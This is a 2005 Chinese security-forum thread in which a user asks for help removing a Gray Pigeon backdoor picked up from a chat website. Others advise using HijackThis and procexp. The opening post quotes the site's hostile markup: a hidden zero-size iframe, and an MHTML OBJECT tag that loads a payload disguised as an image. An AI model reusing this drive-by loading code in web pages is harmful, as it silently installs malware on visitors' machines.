我中了灰鴿子病毒,救命呀?! - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 反病毒/反流氓软件论坛我中了灰鴿子病毒,救命呀?!

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第五十次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

12

1 / 2 页

跳转页

我中了灰鴿子病毒,救命呀?!

數碼科技初生襁褓狮帖子:9 注册: 2005-11-01 来自:	发表于： 2005-11-01 16:47 \| 只看楼主短消息资料字号：小中大 1楼我中了灰鴿子病毒,救命呀?! 我无意间打开了http://chat.yeeyoo.com 然后我的诺顿企业版提示发现病毒如下: 扫描类型：实时防护扫描事件：已发现病毒！病毒名称: Backdoor.Graybird 文件： C:\WINDOWS\serices.DLL 位置：隔离区后来我检查了一下http://chat.yeeyoo.com的源代码发现里面有一句: <iframe src="http://chat.yeeyoo.com/images/index.htm" name="zhu" width="0" height="0" frameborder="0">很可疑于是我直接打开http://chat.yeeyoo.com/images/index.htm,诺顿就提示如上了,我想病毒可能会包含在里面我检查了一下http://chat.yeeyoo.com/images/index.htm的源代码,发现代码如下: <html> <OBJECT style="display:none;" type="text/x-scriptlet" data="MK:@MSITStore:mhtml:c:\.mht!http://chat.yeeyoo.com/images/logo.jpg::/102%2E%68tm"></OBJECT> </body> </html> 我想这就是我在访问http://chat.yeeyoo.com的同时, 又下载了http://chat.yeeyoo.com/images/index.htm这个页面中加载的:OBJECT中的小文件 -------------------------------------------------------------------------------------------------- 访问后,我发现我的系统文件夹,windows目录里面多出一个:sericesKey.DLL,文件,无法删除请瑞星的客服帮忙解决一下用瑞星可以杀掉这个病毒吗??? 2005-11-01 17:08:24
數碼科技初生襁褓狮帖子:9 注册: 2005-11-01 来自:	分享到：

独孤豪侠横据古稀狮帖子:11896 注册: 2005-08-10 来自:花果山	发表于： 2005-11-01 16:49 \| 短消息资料字号：小中大 2楼瑞星杀不掉.请扫一个HJ日志上来,帮你找到病毒主文件.
独孤豪侠横据古稀狮帖子:11896 注册: 2005-08-10 来自:花果山

BlackStone 叱咤花甲狮帖子:2616 注册: 2005-09-27 来自:	发表于： 2005-11-01 16:50 \| 短消息资料字号：小中大 3楼用procexp查看那个进程使用dll，关闭进程，再把dll文件删掉工具使用参考 http://forum.ikaka.com/topic.asp?board=28&artid=7318038
BlackStone 叱咤花甲狮帖子:2616 注册: 2005-09-27 来自:

數碼科技初生襁褓狮帖子:9 注册: 2005-11-01 来自:	发表于： 2005-11-01 16:53 \| 只看楼主短消息资料字号：小中大 4楼病毒的主文件就是:windows目錄里的sericesKey.DLL文件,但是無法刪除
數碼科技初生襁褓狮帖子:9 注册: 2005-11-01 来自:

独孤豪侠横据古稀狮帖子:11896 注册: 2005-08-10 来自:花果山	发表于： 2005-11-01 16:57 \| 短消息资料字号：小中大 5楼晕,dll文件能运行吗??只有exe的文件才是主文件,
独孤豪侠横据古稀狮帖子:11896 注册: 2005-08-10 来自:花果山

独孤豪侠横据古稀狮帖子:11896 注册: 2005-08-10 来自:花果山	发表于： 2005-11-01 16:59 \| 短消息资料字号：小中大 6楼 sericesKey.DLL 这个只是一个小小的键盘输入记录器~~主文件应该是serices.exe
独孤豪侠横据古稀狮帖子:11896 注册: 2005-08-10 来自:花果山

數碼科技初生襁褓狮帖子:9 注册: 2005-11-01 来自:	发表于： 2005-11-01 16:59 \| 只看楼主短消息资料字号：小中大 7楼用HijackThis掃描的進程 Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\system32\spoolsv.exe D:\PROGRA~1\SYMANT~1\SYMANT~1\DefWatch.exe D:\PROGRA~1\SYMANT~1\SYMANT~1\Rtvscan.exe C:\WINDOWS\Explorer.EXE C:\WINDOWS\VM_STI.EXE C:\Program Files\Common Files\Real\Update_OB\realsched.exe C:\WINDOWS\System32\clsmn.exe D:\Program Files\BitComet\BitComet.exe C:\WINDOWS\system32\internat.exe D:\Program Files\Thunder Network\Thunder\Thunder.exe C:\WINDOWS\System32\svchost.exe C:\Program Files\Internet Explorer\IEXPLORE.EXE C:\WINDOWS\System32\Rundll32.exe C:\WINDOWS\System32\Rundll32.exe C:\DOCUME~1\lingyue\LOCALS~1\Temp\HijackThis.exe
數碼科技初生襁褓狮帖子:9 注册: 2005-11-01 来自:

叱咤花甲狮

帖子:2616
注册: 2005-09-27
来自:

发表于： 2005-11-01 17:00 | 短消息资料

字号：小中大 8楼

引用:

【數碼科技的贴子】病毒的主文件就是:windows目錄里的sericesKey.DLL文件,但是無法刪除
...........................

用procexp存一个日志文件贴上来

gototop

數碼科技初生襁褓狮帖子:9 注册: 2005-11-01 来自:	发表于： 2005-11-01 17:01 \| 只看楼主短消息资料字号：小中大 9楼系統目錄里還有一個:c:\windows\serices.exe 這個應該就是真正的主程序名了吧
數碼科技初生襁褓狮帖子:9 注册: 2005-11-01 来自:

独孤豪侠横据古稀狮帖子:11896 注册: 2005-08-10 来自:花果山	发表于： 2005-11-01 17:01 \| 短消息资料字号：小中大 10楼晕呀,要全部的,鸽子大部分在后面的023项里才能看得到.
独孤豪侠横据古稀狮帖子:11896 注册: 2005-08-10 来自:花果山

<<上一主题|下一主题>>

12

1 / 2 页

跳转页

页面顶部

Powered by Discuz!NT